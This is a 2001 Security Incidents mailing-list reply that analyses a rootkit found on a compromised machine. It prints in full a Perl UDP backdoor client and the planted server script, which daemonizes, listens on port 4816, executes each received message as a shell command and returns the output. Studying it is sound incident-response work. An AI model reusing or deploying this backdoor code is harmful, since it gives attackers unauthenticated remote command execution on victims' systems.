Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: New rootkit?

From: Blake Frantz <blake () mc net>
Date: Wed, 12 Dec 2001 14:18:54 -0600 (CST)

I recognize the perl script.  I have it and the client portion of it.  

<client>
#!/usr/bin/perl
 
use IO::Socket;
use Getopt::Std;
 
getopts('s:p:h', \%opt)||die("Error: Unable to get command line options
!!!\n");
 
if(defined($opt{'h'})) { \&usage() }
if(defined($opt{'s'})) { $server=$opt{'s'} } else { \&usage() }
if(defined($opt{'p'})) { $port=$opt{'p'} } else { \&usage() }
 
 
$|=1;
$maxlen=1024;
 
$sock=IO::Socket::INET->new(Proto=>'udp')
or die("Error: Cannot initialize socket !!!\n");
$ipaddr=inet_aton($server);
$portaddr=sockaddr_in($port, $ipaddr);
 
 
print("\nAUDP Backdoor started.\n");
print("======================\n");
 
while(1) {
 print("=> ");
 $mesg=<STDIN>;
 chomp $mesg;
 if($mesg!~/^\s*$/) {
  send($sock, $mesg."\n", 0, $portaddr)==length($mesg."\n");
 
  while($portaddr=recv($sock, $msg, $maxlen, 0)) {
   if($msg=~/^\-end\.$/) { last } else {
    print $msg;
   }
  }
 }
} 
 
sub usage() {
   print("\nAUDP - Programmed by Anarchy\n");
   print("============================\n");
   print("Usage: AUDP -s <host> -p <port>\n\n");
   exit 1;
}
</client>

I googled and found what appears to be another perl script written by the
same author:
http://fringe.davesource.com/Fringe/Hacking/Hacks/Credit_Card_Generator

If you compare the sigs in the code they appear to be written by the
person who sat/is sitting at anarchy () elxsi de.

Hope this helps.

-Blake




/usr/lib/.r00t/.r00tshocky was a perl script to listen for messages on UDP:

#!/usr/bin/perl

$pid=fork;
exit if $pid;
die("Error.") unless defined($pid);

use IO::Socket;
use POSIX;
POSIX::setsid();
$time_to_die=0;

sub signal_handler {
  $time_to_die=1;
}

$SIG{INT}=$SIG{TERM}=$SIG{HUP}=\&signal_handler;

until($time_to_die) {
$|=1;

$port=4816;
$maxlen=1024;

my($sock, $raddr, $rhost);

$sock=IO::Socket::INET->new(LocalPort=>$port,Proto=>'udp') or 
die("Error.Merge deja\n");

while($sock->recv($msg, $maxlen)) {
print $msg;
  my($rport, $ipaddr)=sockaddr_in($sock->peername);
  $rhost=gethostbyaddr($ipaddr, AF_INET);
   $output=`$msg`;
   $sock->send($output);
   $sock->send("-end.");
}
}






----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: